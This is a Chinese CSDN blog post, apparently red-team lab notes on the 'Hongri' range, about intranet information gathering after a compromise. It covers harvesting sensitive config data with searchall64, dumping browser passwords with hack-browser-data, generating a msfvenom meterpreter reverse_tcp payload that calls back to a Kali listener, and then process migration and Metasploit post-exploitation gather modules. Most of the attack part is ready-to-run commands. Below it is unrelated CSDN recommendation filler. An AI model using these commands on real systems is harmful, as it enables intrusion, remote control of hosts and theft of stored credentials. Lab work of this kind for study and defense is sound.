内网信息收集——MSF信息收集&浏览器记录&配置文件敏感信息

于 2024-07-14 16:13:48 发布
阅读量294 收藏 3
点赞数 2
分类专栏: 内网渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140417623
版权

文章目录


域控:windows server 2008
域内机器:win7
攻击机:kali

就是红日靶场(一)的虚拟机。

一、配置文件敏感信息收集

使用searchall64.exe,下图在win7上用的是3.5.6,3.5.9用不了,会报错。

searchall64.exe -p c:// # 收集C盘下的敏感信息

在这里插入图片描述

二、浏览器密码&记录

使用hack-browser-data-windows-64bit.exe,同样这里是在win7上运行,v0.4.3可用,v0.4.5用不了。
在这里插入图片描述

三、MSF信息收集

1、生成反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.92.6 LPORT=4444 -f exe -o reverse_shell.exe

在这里插入图片描述

2、kali开启http服务,win7下载反弹shell

python3 -m http.server 9999

3、kali开始监听(使用msf)

msfconsole                                         # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler                          # 监听木马反弹过来的shell
msset payload windows/x64/meterpreter/reverse_tcp  	   # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set lhost 192.168.92.6                          # 我们的kali本机ip
set lport 4444                                    # 我们的kali本机端口
exploit                                            # 开始进行监听;

在这里插入图片描述
在win7上运行反弹shelltest.exe,即可获取win7的shell。
在这里插入图片描述
注入到新的进程

getpid # 获取当前进程PID
ps # 查看系统进程
migrate -P <pid> # 迁移到相应pid的进程中

进入受害机shell

shell # 进入shell
chcp 65001 # 修改编码,解决控制台乱码问题

在这里插入图片描述

获取目标机器的分区信息

run post/windows/gather/forensics/enum_drives #获取目标机器的分区信息

在这里插入图片描述

判断是否是虚拟机:

run post/windows/gather/checkvm # 判断是否是虚拟机

在这里插入图片描述

开启了什么服务:

run post/windows/gather/enum_services # 开启了什么服务

在这里插入图片描述

安装了什么应用

run post/windows/gather/enum_applications # 安装了什么应用

在这里插入图片描述

获取主机最近的系统操作

post/windows/gather/dumplinks # 获取主机最近的系统操作

在这里插入图片描述

查看补丁

run post/windows/gather/enum_patches #查看补丁

在这里插入图片描述

PT_silver
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队内攻防渗透:内渗透之Windows内信息收集:内和域
HACKONE的博客
04-10 82
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内中通常会部署大量的络安全设备例如IDSIPS日志审计安全关反病毒等在域络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
络安全信息收集
wuli1024的博客
12-09 1098
6).微信公众号如果目标具有相关公众号,那么渗透相关公众号,绝对会有意外收获,比如获取不少漏洞+域名,可以参考 Burp APP抓包抓取微信公众号数据。7).暴力破解/字典枚举所谓暴力破解即利用一个已经生成的数字组合不断尝试与目标匹配,直到找出相符的目标单位。暴力破解可以用很多工具,如DNSReconcile、Layer子域名挖掘机、DirBuster、fierce、dnsdict6、dnsenum、dnsmap、dnsrecon、等等下面举个几个例子,同时这里的字典就用工具自带的字典了。
Notes Fifteenth Day-渗透攻击-红队-内部信息搜集
热门推荐
qq_34801745的博客
10-01 1万+
** Notes Fifteenth Day-渗透攻击-红队-打入内(dayu) ** 作者:大余 时间:2020-10-1 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
渗透-内信息搜集
cdyunaq的博客
03-25 1297
前言 当我们能访问到⽬标内⽹任何资源之后,我们就可以对 ⽬标内⽹进⾏更深层次的信息搜集⽐如:主机收集、IP 段搜集、端⼝开放服务、Web 资产数量、漏洞类型。接下来是一些工具的食用姿势,仅供参考。 假设我们已经获取到 web-2012 的权限,接下来如何对内⽹进⾏信息搜集,内⽹扫描。 信息收集 主机存活探测 基于netbios的内存活主机发现 netbios简介 IBM公司开发,主要用于数十台计算机的小型局域。该协议是一种在局域上的程序可以 使用的应用程序编程接口(API),为程序提供了
企业信息化第三方咨询.ppt
11-21
企业信息化第三方咨询是企业在进行信息化建设过程中,为了获取专业建议、规避风险、优化资源利用而引入的专业咨询服务。这种服务通常由非企业内部的独立咨询机构提供,帮助企业制定、执行和评估信息化战略。以下是对...
企业信息化需要第三方咨询.ppt
11-21
企业信息化是现代企业发展的必然趋势,它涉及到企业的各个层面,包括业务流程、产品技术、项目管理以及绩效评估等。在企业信息化过程中,第三方咨询的作用显得尤为重要。以下将详细阐述企业为何需要第三方咨询以及其...
信息系统安全实验1,页数8
11-01
Linux下使用hydra对口令暴力破解 msf利用远程桌面协议RDP拒绝访问漏洞
MSF11111
01-05
为了使Metasploit框架能够找到这个配置文件,我们需要在`/etc/profile`中添加一行`export MSF_DATABASE_CONFIG=/opt/metasploit/config/database.yml`,然后重启系统使配置生效。 了解Metasploit的目录结构对有效...
PHP-MSF 入门教程之服务&amp;路由&amp;应用
11-15
PHP微服务框架即&ldquo;Micro Service Framework For PHP&rdquo;,是Camera360社区服务器端团队基于Swoole自主研发现代化的PHP协程服务框架,简称msf或者php-msf,是Swoole的工程级企业应用框架,经受了Camera360亿级用户高...
一文解读,络安全行业人才需求情况《络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家络安全宣传周在全国各地开展活动,络安全再一次成为热门话题。络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入安行列。 今天雨笋君就10月13日在络安全宣传周上发布的《2021络安全人才报告》进行一个简单的行业前景分析。 一、络安全行业市场发展情况 络时代生活越来越离不开络,与此同时发生的络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有络安全保障,个人和企业等重.
分包合同计量单.docx
07-13
分包合同计量单.docx
树莓派简介PPT课件.ppt
07-13
树莓派简介PPT课件.ppt
项目债务盘点明细表.docx
07-13
项目债务盘点明细表.docx
最热Python3入门+进阶 更快上手实际开发
最新发布
07-13
最热Python3入门+进阶 更快上手实际开发 第1章 Python入门导学.mp4 239.6MB 第9章 高级部分:面向对象 第8章 Python函数 第7章 包、模块、函数与变量作用域 第6章 分支、循环、条件与枚举 第5章 变量与运算符 第4章 Python中表示&ldquo;组&rdquo;的概念与定义 第3章 理解什么是写代码与Python的基本类型 第2章 Python环境安装 第1章 Python入门导学 第14章 Pythonic与Python杂记 第13章 实战:原生爬虫 第12章 函数式编程: 匿名函数、高阶函数、装饰器
管理干部培训计划PPT模板
07-13
【作品名称】:管理干部培训计划PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
黑色风格年终总结汇报PPT模板
07-13
【作品名称】:黑色风格年终总结汇报PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
Java实训教程 Java软件开发实战 Java类库 第4章 集合操作 共31页.pptx
07-13
【课程大纲】 完整教程:https://download.csdn.net/download/qq_27595745/89538425 Java软件开发实战 Java类库 第1章 Object类 共29页.pptx Java软件开发实战 Java类库 第2章 字符串处理 共49页.pptx Java软件开发实战 Java类库 第3章 包装器类等 共40页.pptx Java软件开发实战 Java类库 第4章 集合操作 共31页.pptx Java软件开发实战 Java类库 第5章 io操作 共35页.pptx Java软件开发实战 Java类库 第6章 其它综合 共38页.pptx Java软件开发实战 Java类库 第7章 JDBC 共113页.pptx
红金商务风2024新征程再出发通用工作汇报PPT模板 (2)
07-13
【作品名称】:红金商务风2024新征程再出发通用PPT模板 (2) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
Web渗透面试面试集锦.docx
12-14
1.1 MSF、Burp 考题 1.1.1 burpsuite 常用的功能是哪几个 答:仪表盘、漏洞扫描、代理、测试器、重发器、定序器 、编码器 、对比器 、 插件扩展、项目选项、用户选项等。 1.1.2 reverse_tcp 和 bind_tcp 的区别 答: (1)reverse_tcp 木马会主动连接目标服务器 (2)bind_tcp 木马会监听本地的端口 1.2.1 拿到一个待检测的站或给你一个站,你觉得应该先做什么? 一、信息收集 1.获取域名的 whois 信息,获取注册者邮箱姓名电话等。 2.通过站长之家、明小子、k8、站长之家等查询服务器旁站以及子域名站点,因为主站一般 比较难,所以先看看旁站有没有通用性的 cms 或者其他漏洞。 3、通过 DNS 域传送漏洞、备份号查询、SSl 证书、APP、微信公众号、暴力破解、DNS 历史记录、K8 C 段查询、Jsfinder、360 或华为威胁情报、证书序列号获取企业二级域名与 ip。 4、通过 Nmap、Wappalyzer、御剑等查看服务器操作系统版本,web 中间件,看看是否存 在已知的漏洞,比如 IIS,APA

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值